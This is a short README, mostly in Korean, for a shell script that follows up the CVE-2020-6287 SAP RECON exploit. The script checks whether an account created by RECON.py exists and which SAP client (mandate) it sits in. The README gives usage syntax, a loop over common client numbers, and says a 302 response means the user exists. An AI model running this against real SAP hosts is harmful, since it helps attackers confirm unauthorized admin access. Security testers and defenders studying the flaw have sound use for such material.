
Checker는 생성된 계정을 검증하거나 그 권한(mandat)을 찾는 데 도움을 줍니다.
생성된 계정을 확인하거나 해당 계정의 mandate를 찾는 데 도움이 되는 체커
이 스크립트는 RECON.py 익스플로잇을 사용할 때 계정이 생성되었는지 확인하거나 생성된 계정의 mandate를 찾을 수 있게 해줍니다.
https://github.com/chipik/SAP_RECON
chmod +x
./checker_CVE-2020-6287.sh <start mndt> <stop mndt> <ip> <port> <login> <password>
- <start mndt> : first value of mandate for iterate (000-999) useful for me 000,001,002,003,004,005,006,007,008,009,066,100,150,200,500,520
- <stop mndt> : last value for iterate
- <ip> : IP address of vulnerable host
- <port> : endpoint of vulnerable service
- <login> : login created with RECON.py
- <password> : password created with RECON.py
for i in {000,001,002,003,004,005,006,007,008,009,066,100,150,200,500,520}; do ./checker_CVE-2020-6287.sh ${i} ${i} <ip> <port> <login> <password>;done

첫 번째 값은 mandate입니다. 코드 302는 사용자가 존재한다는 뜻입니다.